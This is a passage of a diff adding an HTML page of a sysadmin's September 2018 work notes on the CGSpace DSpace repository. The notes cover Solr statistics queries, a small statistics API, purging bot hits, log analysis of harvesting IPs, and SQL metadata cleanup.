+<li>For example, when you expand the &ldquo;statlet&rdquo; at the bottom of an item like <a href="https://cgspace.cgiar.org/handle/10568/97103">10568/97103</a> you can see the following request in the browser console:</li>
+</ul>
+<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
+</code></pre><ul>
+<li>That JSON file has the total page views and item downloads for the item&hellip;</li>
+<li>Abenet forwarded a request by CIP that item thumbnails be included in RSS feeds</li>
+<li>I had a quick look at the DSpace 5.x manual and it doesn&rsquo;t not seem that this is possible (you can only add metadata)</li>
+<li>Testing the new LDAP server the CGNET says will be replacing the old one, it doesn&rsquo;t seem that they are using the global catalog on port 3269 anymore, now only 636 is open</li>
+<li>I did a clean deploy of DSpace 5.8 on Ubuntu 18.04 with some stripped down Tomcat 8 configuration and actually managed to get it up and running without the autowire errors that I had previously experienced</li>
+<li>I realized that it always works on my local machine with Tomcat 8.5.x, but not when I do the deployment from Ansible in Ubuntu 18.04</li>
+<li>So there must be something in my Tomcat 8 <code>server.xml</code> template</li>
+<li>Now I re-deployed it with the normal server template and it&rsquo;s working, WTF?</li>
+<li>Must have been something like an old DSpace 5.5 file in the spring folder&hellip; weird</li>
+<li>But yay, this means we can update DSpace Test to Ubuntu 18.04, Tomcat 8, PostgreSQL 9.6, etc&hellip;</li>
+</ul>
+<h2 id="2018-09-14">2018-09-14</h2>
+<ul>
+<li>Sisay uploaded the IITA records to CGSpace, but forgot to remove the old Handles</li>
+<li>I explicitly told him not to forget to remove them yesterday!</li>
+</ul>
+<h2 id="2018-09-16">2018-09-16</h2>
+<ul>
+<li>Add the DSpace build.properties as a template into my <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> for configuring DSpace machines</li>
+<li>One stupid thing there is that I add all the variables in a private vars file, which is apparently higher precedence than host vars, meaning that I can&rsquo;t override them (like SMTP server) on a per-host basis</li>
+<li>Discuss access and usage rights with Peter</li>
+<li>I suggested that we leave access rights (<code>cg.identifier.access</code>) as it is now, with &ldquo;Open Access&rdquo; or &ldquo;Limited Access&rdquo;, and then simply re-brand that as &ldquo;Access rights&rdquo; in the UIs and relevant drop downs</li>
+<li>Then we continue as planned to add <code>dc.rights</code> as &ldquo;Usage rights&rdquo;</li>
+</ul>
+<h2 id="2018-09-17">2018-09-17</h2>
+<ul>
+<li>Skype meeting with CGSpace team in Addis</li>
+<li>Change <code>cg.identifier.status</code> &ldquo;Access rights&rdquo; options to:
+<ul>
+<li>Open Access→Unrestricted Access</li>
+<li>Limited Access→Restricted Access</li>
+<li>Metadata Only</li>
+</ul>
+</li>
+<li>Update these immediately, but talk to CodeObia to create a mapping between the old and new values</li>
+<li>Finalize <code>dc.rights</code> &ldquo;Usage rights&rdquo; with seven combinations of Creative Commons, plus the others</li>
+<li>Need to double check the new <a href="https://cgspace.cgiar.org/handle/10568/97114">CRP community</a> to see why the collection counts aren&rsquo;t updated after we moved the communities there last week
+<ul>
+<li>I forced a full Discovery re-index and now the community shows 1,600 items</li>
+</ul>
+</li>
+<li>Check if it&rsquo;s possible to have items deposited via REST use a workflow so we can perhaps tell ICARDA to use that from MEL</li>
+<li>Agree that we&rsquo;ll publicize AReS explorer on the week before the Big Data Platform workshop
+<ul>
+<li>Put a link and or picture on the CGSpace homepage saying &ldquo;Visualized CGSpace research&rdquo; or something, and post a message on Yammer</li>
+</ul>
+</li>
+<li>I want to explore creating a thin API to make the item view and download stats available from Solr so CodeObia can use them in the AReS explorer</li>
+<li>Currently CodeObia is exploring using the Atmire statlets internal API, but I don&rsquo;t really like that&hellip;</li>
+<li>There are some example queries on the <a href="https://wiki.lyrasis.org/display/DSPACE/Solr">DSpace Solr wiki</a></li>
+<li>For example, this query returns 1655 rows for item <a href="https://cgspace.cgiar.org/handle/10568/10630">10568/10630</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&#39;
+</code></pre><ul>
+<li>The id in the Solr query is the item&rsquo;s database id (get it from the REST API or something)</li>
+<li>Next, I adopted a query to get the downloads and it shows 889, which is similar to the number Atmire&rsquo;s statlet shows, though the query logic here is confusing:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
+</code></pre><ul>
+<li>According to the <a href="https://wiki.apache.org/solr/SolrQuerySyntax">SolrQuerySyntax</a> page on the Apache wiki, the <code>[* TO *]</code> syntax just selects a range (in this case all values for a field)</li>
+<li>So it seems to be:
+<ul>
+<li><code>type:0</code> is for bitstreams according to the DSpace Solr documentation</li>
+<li><code>-(bundleName:[*+TO+*]-bundleName:ORIGINAL)</code> seems to be a <a href="https://wiki.apache.org/solr/NegativeQueryProblems">negative query starting with all documents</a>, subtracting those with <code>bundleName:ORIGINAL</code>, and then negating the whole thing&hellip; meaning only documents from <code>bundleName:ORIGINAL</code>?</li>
+</ul>
+</li>
+<li>What the shit, I think I&rsquo;m right: the simplified logic in <em>this</em> query returns the same 889:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
+</code></pre><ul>
+<li>And if I simplify the <code>statistics_type</code> logic the same way, it still returns the same 889!</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
+</code></pre><ul>
+<li>As for item views, I suppose that&rsquo;s just the same query, minus the <code>bundleName:ORIGINAL</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
+</code></pre><ul>
+<li>That one returns 766, which is exactly 1655 minus 889&hellip;</li>
+<li>Also, Solr&rsquo;s <code>fq</code> is similar to the regular <code>q</code> query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries</li>
+</ul>
+<h2 id="2018-09-18">2018-09-18</h2>
+<ul>
+<li>I managed to create a simple proof of concept REST API to expose item view and download statistics: <a href="https://github.com/alanorth/cgspace-statistics-api">cgspace-statistics-api</a></li>
+<li>It uses the Python-based <a href="https://falcon.readthedocs.io">Falcon</a> web framework and talks to Solr directly using the <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> library (which seems to have issues in Python 3.7 currently)</li>
+<li>After deploying on DSpace Test I can then get the stats for an item using its ID:</li>
+</ul>
+<pre tabindex="0"><code>$ http -b &#39;https://dspacetest.cgiar.org/rest/statistics/item?id=110988&#39;
+{
+    &#34;downloads&#34;: 2,
+    &#34;id&#34;: 110988,
+    &#34;views&#34;: 15
+}
+</code></pre><ul>
+<li>The numbers are different than those that come from Atmire&rsquo;s statlets for some reason, but as I&rsquo;m querying Solr directly, I have no idea where their numbers come from!</li>
+<li>Moayad from CodeObia asked if I could make the API be able to paginate over all items, for example: /statistics?limit=100&amp;page=1</li>
+<li>Getting all the item IDs from PostgreSQL is certainly easy:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
+</code></pre><ul>
+<li>The rest of the Falcon tooling will be more difficult&hellip;</li>
+</ul>
+<h2 id="2018-09-19">2018-09-19</h2>
+<ul>
+<li>I emailed Jane Poole to ask if there is some money we can use from the Big Data Platform (BDP) to fund the purchase of some Atmire credits for CGSpace</li>
+<li>I learned that there is an efficient way to do <a href="http://yonik.com/solr/paging-and-deep-paging/">&ldquo;deep paging&rdquo; in large Solr results sets by using <code>cursorMark</code></a>, but it doesn&rsquo;t work with faceting</li>
+</ul>
+<h2 id="2018-09-20">2018-09-20</h2>
+<ul>
+<li>Contact Atmire to ask how we can buy more credits for future development (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=644">#644</a>)</li>
+<li>I researched the Solr <code>filterCache</code> size and I found out that the formula for calculating the potential memory use of <strong>each entry</strong> in the cache is:</li>
+</ul>
+<pre tabindex="0"><code>((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
+</code></pre><ul>
+<li>Which means that, for our statistics core with <em>149 million</em> documents, each entry in our <code>filterCache</code> would use 8.9 GB!</li>
+</ul>
+<pre tabindex="0"><code>((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
+</code></pre><ul>
+<li>So I think we can forget about tuning this for now!</li>
+<li><a href="http://lucene.472066.n3.nabble.com/Calculating-filterCache-size-td4142526.html">Discussion on the mailing list about <code>filterCache</code> size</a></li>
+<li><a href="https://docs.google.com/document/d/1vl-nmlprSULvNZKQNrqp65eLnLhG9s_ydXQtg9iML10/edit">Article discussing testing methodology for different <code>filterCache</code> sizes</a></li>
+<li>Discuss Handle links on Twitter with IWMI</li>
+</ul>
+<h2 id="2018-09-21">2018-09-21</h2>
+<ul>
+<li>I see that there was a nice optimization to the ImageMagick PDF CMYK detection in the upstream <code>dspace-5_x</code> branch: <a href="https://github.com/DSpace/DSpace/pull/2204">DS-3664</a></li>
+<li>The fix will go into DSpace 5.10, and we are currently on DSpace 5.8 but I think I&rsquo;ll cherry-pick that fix into our <code>5_x-prod</code> branch:
+<ul>
+<li>4e8c7b578bdbe26ead07e36055de6896bbf02f83: ImageMagick: Only execute &ldquo;identify&rdquo; on first page</li>
+</ul>
+</li>
+<li>I think it would also be nice to cherry-pick the fixes for <a href="https://github.com/DSpace/DSpace/pull/2020">DS-3883</a>, which is related to optimizing the XMLUI item display of items with many bitstreams
+<ul>
+<li>a0ea20bd1821720b111e2873b08e03ce2bf93307: DS-3883: Don&rsquo;t loop through original bitstreams if only displaying thumbnails</li>
+<li>8d81e825dee62c2aa9d403a505e4a4d798964e8d: DS-3883: If only including thumbnails, only load the main item thumbnail.</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-23">2019-09-23</h2>
+<ul>
+<li>I did more work on my <a href="https://github.com/alanorth/cgspace-statistics-api">cgspace-statistics-api</a>, fixing some item view counts and adding indexing via SQLite (I&rsquo;m trying to avoid having to set up <em>yet another</em> database, user, password, etc) during deployment</li>
+<li>I created a new branch called <code>5_x-upstream-cherry-picks</code> to test and track those cherry-picks from the upstream 5.x branch</li>
+<li>Also, I need to test the new LDAP server, so I will deploy that on DSpace Test today</li>
+<li>Rename my cgspace-statistics-api to <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> on GitHub</li>
+</ul>
+<h2 id="2018-09-24">2018-09-24</h2>
+<ul>
+<li>Trying to figure out how to get item views and downloads from SQLite in a join</li>
+<li>It appears SQLite doesn&rsquo;t support <code>FULL OUTER JOIN</code> so some people on StackOverflow have emulated it with <code>LEFT JOIN</code> and <code>UNION</code>:</li>
+</ul>
+<pre tabindex="0"><code>&gt; SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
+LEFT JOIN itemdownloads downloads USING(id)
+UNION ALL
+SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemdownloads downloads
+LEFT JOIN itemviews views USING(id)
+WHERE views.id IS NULL;
+</code></pre><ul>
+<li>This &ldquo;works&rdquo; but the resulting rows are kinda messy so I&rsquo;d have to do extra logic in Python</li>
+<li>Maybe we can use one &ldquo;items&rdquo; table with defaults values and UPSERT (aka insert&hellip; on conflict &hellip; do update):</li>
+</ul>
+<pre tabindex="0"><code>sqlite&gt; CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
+sqlite&gt; INSERT INTO items(id, views) VALUES(0, 52);
+sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 171);
+sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 176) ON CONFLICT(id) DO UPDATE SET downloads=176;
+sqlite&gt; INSERT INTO items(id, views) VALUES(0, 78) ON CONFLICT(id) DO UPDATE SET views=78;
+sqlite&gt; INSERT INTO items(id, views) VALUES(0, 3) ON CONFLICT(id) DO UPDATE SET downloads=3;
+sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE SET downloads=excluded.views;
+</code></pre><ul>
+<li>This totally works!</li>
+<li>Note the special <code>excluded.views</code> form! See <a href="https://www.sqlite.org/lang_UPSERT.html">SQLite&rsquo;s lang_UPSERT documentation</a></li>
+<li>Oh nice, I finally finished the Falcon API route to page through all the results using SQLite&rsquo;s amazing <code>LIMIT</code> and <code>OFFSET</code> support</li>
+<li>But when I deployed it on my Ubuntu 16.04 environment I realized Ubuntu&rsquo;s SQLite is old and doesn&rsquo;t support <code>UPSERT</code>, so my indexing doesn&rsquo;t work&hellip;</li>
+<li>Apparently <code>UPSERT</code> came in SQLite 3.24.0 (2018-06-04), and Ubuntu 16.04 has 3.11.0</li>
+<li>Ok this is hilarious, I manually downloaded the <a href="https://packages.ubuntu.com/cosmic/libsqlite3-0">libsqlite3 3.24.0 deb from Ubuntu 18.10 &ldquo;cosmic&rdquo;</a> and installed it in Ubnutu 16.04 and now the Python <code>indexer.py</code> works</li>
+<li>This is definitely a dirty hack, but the list of packages we use that depend on <code>libsqlite3-0</code> in Ubuntu 16.04 are actually pretty few:</li>
+</ul>
+<pre tabindex="0"><code># apt-cache rdepends --installed libsqlite3-0 | sort | uniq
+  gnupg2
+  libkrb5-26-heimdal
+  libnss3
+  libpython2.7-stdlib
+  libpython3.5-stdlib
+</code></pre><ul>
+<li>I wonder if I could work around this by detecting the SQLite library version, for example on Ubuntu 16.04 after I replaced the library:</li>
+</ul>
+<pre tabindex="0"><code># python3
+Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
+[GCC 5.4.0 20160609] on linux
+Type &#34;help&#34;, &#34;copyright&#34;, &#34;credits&#34; or &#34;license&#34; for more information.
+&gt;&gt;&gt; import sqlite3
+&gt;&gt;&gt; print(sqlite3.sqlite_version)
+3.24.0
+</code></pre><ul>
+<li>Or maybe I should just bite the bullet and migrate this to PostgreSQL, as it <a href="https://wiki.postgresql.org/wiki/UPSERT">supports <code>UPSERT</code> since version 9.5</a> and also seems to have my new favorite <code>LIMIT</code> and <code>OFFSET</code></li>
+<li>I changed the syntax of the SQLite stuff and PostgreSQL is working flawlessly with psycopg2&hellip; hmmm.</li>
+<li>For reference, creating a PostgreSQL database for testing this locally (though <code>indexer.py</code> will create the table):</li>
+</ul>
+<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
+$ createuser -h localhost -U postgres --pwprompt dspacestatistics
+$ psql -h localhost -U postgres dspacestatistics
+dspacestatistics=&gt; CREATE TABLE IF NOT EXISTS items
+dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0)
+</code></pre><h2 id="2018-09-25">2018-09-25</h2>
+<ul>
+<li>I deployed the DSpace statistics API on CGSpace, but when I ran the indexer it wanted to index 180,000 pages of item views</li>
+<li>I&rsquo;m not even sure how that&rsquo;s possible, as we only have 74,000 items!</li>
+<li>I need to inspect the <code>id</code> values that are returned for views and cross check them with the <code>owningItem</code> values for bitstream downloads&hellip;</li>
+<li>Also, I could try to check all IDs against the items table to see if they are actually items (perhaps the Solr <code>id</code> field doesn&rsquo;t correspond with <em>actual</em> DSpace items?)</li>
+<li>I want to purge the bot hits from the Solr statistics core, as I am now realizing that I don&rsquo;t give a shit about tens of millions of hits by Google and Bing indexing my shit every day (at least not in Solr!)</li>
+<li>CGSpace&rsquo;s Solr core has 150,000,000 documents in it&hellip; and it&rsquo;s still pretty fast to query, but it&rsquo;s really a maintenance and backup burden</li>
+<li>DSpace Test currently has about 2,000,000 documents with <code>isBot:true</code> in its Solr statistics core, and the size on disk is 2GB (it&rsquo;s not much, but I have to test this somewhere!)</li>
+<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics+Maintenance">DSpace 5.x Solr documentation</a> I can use <code>dspace stats-util -f</code>, so let&rsquo;s try it:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace stats-util -f
+</code></pre><ul>
+<li>The command comes back after a few seconds and I still see 2,000,000 documents in the statistics core with <code>isBot:true</code></li>
+<li>I was just writing a message to the dspace-tech mailing list and then I decided to check the number of bot view events on DSpace Test again, and now it&rsquo;s 201 instead of 2,000,000, and statistics core is only 30MB now!</li>
+<li>I will set the <code>logBots = false</code> property in <code>dspace/config/modules/usage-statistics.cfg</code> on DSpace Test and check if the number of <code>isBot:true</code> events goes up any more&hellip;</li>
+<li>I restarted the server with <code>logBots = false</code> and after it came back up I see 266 events with <code>isBots:true</code> (maybe they were buffered)&hellip; I will check again tomorrow</li>
+<li>After a few hours I see there are still only 266 view events with <code>isBot:true</code> on DSpace Test&rsquo;s Solr statistics core, so I&rsquo;m definitely going to deploy this on CGSpace soon</li>
+<li>Also, CGSpace currently has 60,089,394 view events with <code>isBot:true</code> in it&rsquo;s Solr statistics core and it is 124GB!</li>
+<li>Amazing! After running <code>dspace stats-util -f</code> on CGSpace the Solr statistics core went from 124GB to 60GB, and now there are only 700 events with <code>isBot:true</code> so I should really disable logging of bot events!</li>
+<li>I&rsquo;m super curious to see how the JVM heap usage changes&hellip;</li>
+<li>I made (and merged) a pull request to disable bot logging on the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/387">#387</a>)</li>
+<li>Now I&rsquo;m wondering if there are other bot requests that aren&rsquo;t classified as bots because the IP lists or user agents are outdated</li>
+<li>DSpace ships a list of spider IPs, for example: <code>config/spiders/iplists.com-google.txt</code></li>
+<li>I checked the list against all the IPs we&rsquo;ve seen using the &ldquo;Googlebot&rdquo; useragent on CGSpace&rsquo;s nginx access logs</li>
+<li>The first thing I learned is that shit tons of IPs in Russia, Ukraine, Ireland, Brazil, Portugal, the US, Canada, etc are pretending to be &ldquo;Googlebot&rdquo;&hellip;</li>
+<li>According to the <a href="https://support.google.com/webmasters/answer/80553">Googlebot FAQ</a> the domain name in the reverse DNS lookup should contain either <code>googlebot.com</code> or <code>google.com</code></li>
+<li>In Solr this appears to be an appropriate query that I can maybe use later (returns 81,000 documents):</li>
+</ul>
+<pre tabindex="0"><code>*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
+</code></pre><ul>
+<li>I translate that into a delete command using the <code>/update</code> handler:</li>
+</ul>
+<pre tabindex="0"><code>http://localhost:8081/solr/statistics/update?commit=true&amp;stream.body=&lt;delete&gt;&lt;query&gt;*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false&lt;/query&gt;&lt;/delete&gt;
+</code></pre><ul>
+<li>And magically all those 81,000 documents are gone!</li>
+<li>After a few hours the Solr statistics core is down to 44GB on CGSpace!</li>
+<li>I did a <em>major</em> refactor and logic fix in the DSpace Statistics API&rsquo;s <code>indexer.py</code></li>
+<li>Basically, it turns out that using <code>facet.mincount=1</code> is really beneficial for me because it reduces the size of the Solr result set, reduces the amount of data we need to ingest into PostgreSQL, and the API returns HTTP 404 Not Found for items without views or downloads anyways</li>
+<li>I deployed the new version on CGSpace and now it looks pretty good!</li>
+</ul>
+<pre tabindex="0"><code>Indexing item views (page 28 of 753)
+...
+Indexing item downloads (page 260 of 260)
+</code></pre><ul>
+<li>And now it&rsquo;s fast as hell due to the muuuuch smaller Solr statistics core</li>
+</ul>
+<h2 id="2018-09-26">2018-09-26</h2>
+<ul>
+<li>Linode emailed to say that CGSpace (linode18) was using 30Mb/sec of outward bandwidth for two hours around midnight</li>
+<li>I don&rsquo;t see anything unusual in the nginx logs, so perhaps it was the cron job that syncs the Solr database to Amazon S3?</li>
+<li>It could be that the bot purge yesterday changed the core significantly so there was a lot to change?</li>
+<li>I don&rsquo;t see any drop in JVM heap size in CGSpace&rsquo;s munin stats since I did the Solr cleanup, but this looks pretty good:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/09/tomcat_maxtime-week.png" alt="Tomcat max processing time week"></p>
+<ul>
+<li>I will have to keep an eye on that over the next few weeks to see if things stay as they are</li>
+<li>I did a batch replacement of the access rights with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.status -t correct -m 206
+</code></pre><ul>
+<li>This changes &ldquo;Open Access&rdquo; to &ldquo;Unrestricted Access&rdquo; and &ldquo;Limited Access&rdquo; to &ldquo;Restricted Access&rdquo;</li>
+<li>After that I did a full Discovery reindex:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    77m3.755s
+user    7m39.785s
+sys     2m18.485s
+</code></pre><ul>
+<li>I told Peter it&rsquo;s better to do the access rights before the usage rights because the git branches are conflicting with each other and it&rsquo;s actually a pain in the ass to keep changing the values as we discuss, rebase, merge, fix conflicts&hellip;</li>
+<li>Udana and Mia from WLE were asking some questions about their <a href="https://feeds.feedburner.com/WLEcgspace">WLE Feedburner feed</a></li>
+<li>It&rsquo;s pretty confusing, because until recently they were entering issue dates as only YYYY (like 2018) and their feeds were all showing items in the wrong order</li>
+<li>I&rsquo;m not exactly sure what their problem now is, though (confusing)</li>
+<li>I updated the dspace-statistiscs-api to use psycopg2&rsquo;s <code>execute_values()</code> to insert batches of 100 values into PostgreSQL instead of doing every insert individually</li>
+<li>On CGSpace this reduces the total run time of <code>indexer.py</code> from 432 seconds to 400 seconds (most of the time is actually spent in getting the data from Solr though)</li>
+</ul>
+<h2 id="2018-09-27">2018-09-27</h2>
+<ul>
+<li>Linode emailed to say that CGSpace&rsquo;s (linode19) CPU load was high for a few hours last night</li>
+<li>Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;26/Sep/2018:(19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    295 34.218.226.147
+    296 66.249.64.95
+    350 157.55.39.185
+    359 207.46.13.28
+    371 157.55.39.85
+    388 40.77.167.148
+    444 66.249.64.93
+    544 68.6.87.12
+    834 66.249.64.91
+    902 35.237.175.180
+</code></pre><ul>
+<li><code>35.237.175.180</code> is on Google Cloud</li>
+<li><code>68.6.87.12</code> is on Cox Communications in the US (?)</li>
+<li>These hosts are not using proper user agents and are not re-using their Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-09-26 | sort | uniq
+5423
+$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12&#39; dspace.log.2018-09-26 | sort | uniq
+758
+</code></pre><ul>
+<li>I will add their IPs to the list of bad bots in nginx so we can add a &ldquo;bot&rdquo; user agent to them and let Tomcat&rsquo;s Crawler Session Manager Valve handle them</li>
+<li>I asked Atmire to prepare an invoice for 125 credits</li>
+</ul>
+<h2 id="2018-09-29">2018-09-29</h2>
+<ul>
+<li>I merged some changes to author affiliations from Sisay as well as some corrections to organizational names using smart quotes like <code>Université d’Abomey Calavi</code> (<a href="https://github.com/ilri/DSpace/pull/388">#388</a>)</li>
+<li>Peter sent me a list of 43 author names to fix, but it had some encoding errors like <code>BelalcÃ¡zar, John</code> like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)</li>
+<li>I did batch replaces for both on CGSpace with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
+$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
+</code></pre><ul>
+<li>Afterwards I started a full Discovery re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>Linode sent an alert that both CGSpace and DSpace Test were using high CPU for the last two hours</li>
+<li>It seems to be Moayad trying to do the AReS explorer indexing</li>
+<li>He was sending too many (5 or 10) concurrent requests to the server, but still&hellip; why is this shit so slow?!</li>
+</ul>
+<h2 id="2018-09-30">2018-09-30</h2>
+<ul>
+<li>Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc</li>
+<li>I think I should just batch export and update all languages&hellip;</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
+</code></pre><ul>
+<li>Then I can simply delete the &ldquo;Other&rdquo; and &ldquo;other&rdquo; ones because that&rsquo;s not useful at all:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Other&#39;;
+DELETE 6
+dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;other&#39;;
+DELETE 79
+</code></pre><ul>
+<li>Looking through the list I see some weird language codes like <code>gh</code>, so I checked out those items:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
+ resource_id
+-------------
+       94530
+       94529
+dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2 AND handle.resource_id = item.item_id AND handle.resource_id in (94530, 94529);
+   handle    | item_id
+-------------+---------
+ 10568/91386 |   94529
+ 10568/91387 |   94530
+</code></pre><ul>
+<li>Those items are from Ghana, so the submitter apparently thought <code>gh</code> was a language&hellip; I can safely delete them:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
+DELETE 2
+</code></pre><ul>
+<li>The next issue would be <code>jn</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
+ resource_id
+-------------
+       94001
+       94003
+dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2 AND handle.resource_id = item.item_id AND handle.resource_id in (94001, 94003);
+   handle    | item_id
+-------------+---------
+ 10568/90868 |   94001
+ 10568/90870 |   94003
+</code></pre><ul>
+<li>Those items are about Japan, so I will update them to be <code>ja</code></li>
+<li>Other replacements:</li>
+</ul>
+<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
+UPDATE metadatavalue SET text_value=&#39;fr&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;fn&#39;;
+UPDATE metadatavalue SET text_value=&#39;hi&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;in&#39;;
+UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Ja&#39;;
+UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
+UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jp&#39;;
+</code></pre><ul>
+<li>Then there are 12 items with <code>en|hi</code>, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
